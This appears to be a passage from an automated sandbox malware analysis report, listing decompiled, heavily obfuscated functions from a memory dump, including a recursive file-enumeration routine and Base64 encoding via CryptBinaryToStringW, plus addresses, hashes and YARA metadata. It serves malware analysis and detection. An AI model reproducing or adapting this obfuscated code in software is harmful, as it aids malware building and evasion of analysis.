0x0024bec9
0x0024bed2
0x0024bedf
0x0024beec
0x0024bef4
0x0024befc
0x0024bf04
0x0024bf0c
0x0024bf11
0x0024bf19
0x0024bf21
0x0024bf29
0x0024bf31
0x0024bf39
0x0024bf3e
0x0024bf46
0x0024bf53
0x0024bf57
0x0024bf5f
0x0024bf5f
0x0024bf65
0x0024bf9e
0x0024bfa3
0x0024bfa6
0x0024bfa8
0x0024bfae
0x00000000
0x0024bfae
0x0024bf67
0x0024bf69
0x0024c0b1
0x0024bf6f
0x0024bf75
0x00000000
0x0024bf7b
0x0024bf7b
0x00000000
0x0024bf7b
0x0024bf75
0x0024bf69
0x0024c0ba
0x0024c0c5
0x0024c0c5
0x0024bfcf
0x0024bfd4
0x0024bfe1
0x0024bff4
0x0024c054
0x0024c06b
0x0024c082
0x0024c087
0x0024c08a
0x0024c08c
0x0024c08c
0x0024c08c
0x00000000

Strings

AX, xrefs: 0024BD3E
):, xrefs: 0024BEF4
l0, xrefs: 0024BEAA
M}, xrefs: 0024BDC9
t, xrefs: 0024BF21
t, xrefs: 0024BC48
tI, xrefs: 0024BC3C
f, xrefs: 0024BC1C
D, xrefs: 0024BFE1
.), xrefs: 0024BBB8
25, xrefs: 0024BF04

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
API String ID: 0-3778435269
Opcode ID: a952abefef2cf525503f7efa4bf58562045c2aae30ce719d2466d18bcb58765e
Instruction ID: ecb4329354276aba937221d9576a14424d2101b85522e0594132a2d80f4ea247
Opcode Fuzzy Hash: a952abefef2cf525503f7efa4bf58562045c2aae30ce719d2466d18bcb58765e
Instruction Fuzzy Hash: 60D102715083819FE368CF65C889A1FFBE1BBC4758F10891DF29A96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00258F49, Relevance: 12.7, Strings: 10, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00258F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E002585BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E00247B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E0025889D(0x25c9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0x25ca2c; // 0x6d8300
						_t196 = _t282 + 0x230; // 0x670056
						E0024C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x25ca2c, _t245,  &_v520);
						_t238 = E00252025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E0025889D(0x25c980, _v1088, __eflags);
					_t240 = E00258C8F(_v1056);
					_t258 =  *0x25ca2c; // 0x6d8300
					_t210 = _t258 + 0x230; // 0x6d8530
					E002429E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E00252025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}

0x00258f49
0x00258f4f
0x00258f56
0x00258f5e
0x00258f66
0x00258f78
0x00258f7d
0x00258f83
0x00258f88
0x00258f8d
0x00258f95
0x00258f9d
0x00258fa5
0x00258fad
0x00258fb5
0x00258fc2
0x00258fca
0x00258fd2
0x00258fda
0x00258fe2
0x00258fea
0x00258fef
0x00258ff7
0x00258fff
0x0025900c
0x0025900d
0x00259011
0x00259019
0x0025901e
0x00259026
0x0025902e
0x00259038
0x0025903c
0x00259044
0x0025904c
0x0025905a
0x0025905e
0x00259066
0x0025906e
0x00259076
0x00259083
0x00259087
0x0025908f
0x00259097
0x0025909f
0x002590a9
0x002590ad
0x002590b5
0x002590bd
0x002590c5
0x002590cd
0x002590d5
0x002590dd
0x002590e5
0x002590ed
0x002590f5
0x002590fd
0x00259105
0x0025910a
0x00259112
0x0025911f
0x00259123
0x0025912b
0x00259133
0x0025913d
0x00259145
0x0025914a
0x00259155
0x0025915a
0x00259160
0x00259168
0x00259175
0x00259178
0x00259181
0x00259185
0x0025918a
0x00259192
0x0025919a
0x0025919f
0x002591a7
0x002591af
0x002591b7
0x002591bf
0x002591c7
0x002591d7
0x002591df
0x002591ef
0x002591f3
0x002591fb
0x00259203
0x0025920b
0x00259213
0x0025921b
0x00259223
0x0025922b
0x00259233
0x0025923b
0x00259247
0x0025924a
0x0025924e
0x00259256
0x00259262
0x00259276
0x00259276
0x00259280
0x0025938d
0x00259395
0x00000000
0x0025939c
0x0025928c
0x002592fc
0x00000000
0x002592fc
0x0025928e
0x00259290
0x00000000
0x00000000
0x00259296
0x002592a3
0x002592a8
0x002592c7
0x002592d4
0x002592da
0x002592ed
0x002592f2
0x002592f5
0x002592f5
0x00259303
0x00259310
0x0025931f
0x00259341
0x0025934d
0x00259353
0x00259369
0x0025936e
0x00259371
0x00259373
0x00259373
0x00259373
0x00000000

Strings

;, xrefs: 002591D7
kI, xrefs: 0025903C
_r*, xrefs: 0025917C, 00259170
E/, xrefs: 00258FCA
Cg+, xrefs: 00259267
m, xrefs: 00258FE2
y, xrefs: 00259192
_r*, xrefs: 0025918A
e, xrefs: 002590CD
aS, xrefs: 00259203

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
API String ID: 0-1402005448
Opcode ID: e56677c7ce760b6b449f53b350dd2469257a1c182db56606c1d63b82d7ca8517
Instruction ID: fbe60ab8b872db4a4da81797848449015d983caa903312deb683cac31cfba10e
Opcode Fuzzy Hash: e56677c7ce760b6b449f53b350dd2469257a1c182db56606c1d63b82d7ca8517
Instruction Fuzzy Hash: 18B13171509381DFD358CF24C58A41BFBE1FBC4798F208A1DF595862A0D7B98A48CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00251773, Relevance: 12.6, Strings: 10, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00251773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E00248736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E002577A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E002577A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}

0x0025177a
0x0025177e
0x00251782
0x00251786
0x0025178a
0x0025178c
0x00251791
0x00251799
0x002517a3
0x002517a5
0x002517b6
0x002517b7
0x002517bb
0x002517c3
0x002517cb
0x002517d5
0x002517d9
0x002517de
0x002517e6
0x002517f9
0x002517fd
0x00251805
0x0025180d
0x00251815
0x0025181d
0x00251825
0x0025182d
0x00251832
0x0025183a
0x00251842
0x00251847
0x0025184f
0x00251857
0x0025185f
0x00251867
0x0025186f
0x00251877
0x0025187f
0x00251884
0x00251889
0x00251891
0x00251899
0x002518a1
0x002518a9
0x002518b1
0x002518b9
0x002518c1
0x002518c9
0x002518d1
0x002518d9
0x002518de
0x002518e6
0x002518ee
0x002518f6
0x002518fb
0x00251903
0x0025190b
0x00251913
0x00251918
0x00251920
0x00251928
0x0025192d
0x00251935
0x0025193d
0x00251945
0x0025194d
0x00251955
0x0025195d
0x0025195d
0x00251963
0x002519c0
0x002519c1
0x002519ca
0x002519d0
0x002519d2
0x00000000
0x002519d2
0x00251965
0x00251967
0x002519a0
0x002519a5
0x002519aa
0x002519ac
0x00000000
0x002519ac
0x00251969
0x0025196f
0x00000000
0x00251975
0x00251975
0x00000000
0x00251975
0x0025196f
0x00251967
0x00000000
0x00251963
0x002519fc
0x00251a01
0x00251a04
0x00251a09
0x00251a09
0x00251a16
0x00251a1e

Strings

(d, xrefs: 002518FB
uL, xrefs: 00251832
x*", xrefs: 00251A09
5E, xrefs: 0025180D
x*", xrefs: 00251A04
SQ, xrefs: 0025192D
rH, xrefs: 002518D1
"y 2, xrefs: 00251847
~Y, xrefs: 00251877
"], xrefs: 002517C3

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
API String ID: 0-656425227
Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction ID: 8762335f6c9d6867a15649d987350d76174e135f97f587de3ad33c60e69b6cfe
Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction Fuzzy Hash: 186120711093829FD359CF60C89992BBBE1BBD5788F104A1DF69696260C3B5CA18CF87

Uniqueness

Uniqueness Score: -1.00%

Function 10002730, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63encryptionmemoryCOMMON

Download Yara Rule

APIs

StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
CoTaskMemAlloc.OLE32(?), ref: 10002782
CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
CoTaskMemFree.OLE32(00000000), ref: 100027CC
CoTaskMemFree.OLE32(?), ref: 100027D6

Strings

o, xrefs: 10002741

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
String ID: o
API String ID: 207024522-3306556724
Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00252B16, Relevance: 11.6, Strings: 9, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00252B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E0025889D(0x25c0b0, _v1756, __eflags);
									_pop(_t360);
									E0024C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E00252B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E00252025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E0024595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E00257BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0025889D(0x25c090, _v1736, __eflags));
							_t346 = E00252025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E0024109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E00241B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}

0x00252b1f
0x00252b26
0x00252b2d
0x00252b34
0x00252b3b
0x00252b43
0x00252b44
0x00252b49
0x00252b54
0x00252b5d
0x00252b64
0x00252b69
0x00252b6f
0x00252b77
0x00252b7f
0x00252b87
0x00252b8f
0x00252b97
0x00252b9f
0x00252ba7
0x00252baf
0x00252bb7
0x00252bbf
0x00252bc7
0x00252bcf
0x00252bd4
0x00252bd9
0x00252be1
0x00252be9
0x00252bf1
0x00252bf9
0x00252c01
0x00252c09
0x00252c0e
0x00252c16
0x00252c1e
0x00252c29
0x00252c34
0x00252c3f
0x00252c4c
0x00252c4f
0x00252c53
0x00252c60
0x00252c64
0x00252c6c
0x00252c77
0x00252c7f
0x00252c8a
0x00252c92
0x00252c9a
0x00252ca2
0x00252caa
0x00252cb2
0x00252cba
0x00252cc6
0x00252cc9
0x00252ccd
0x00252cd5
0x00252cdd
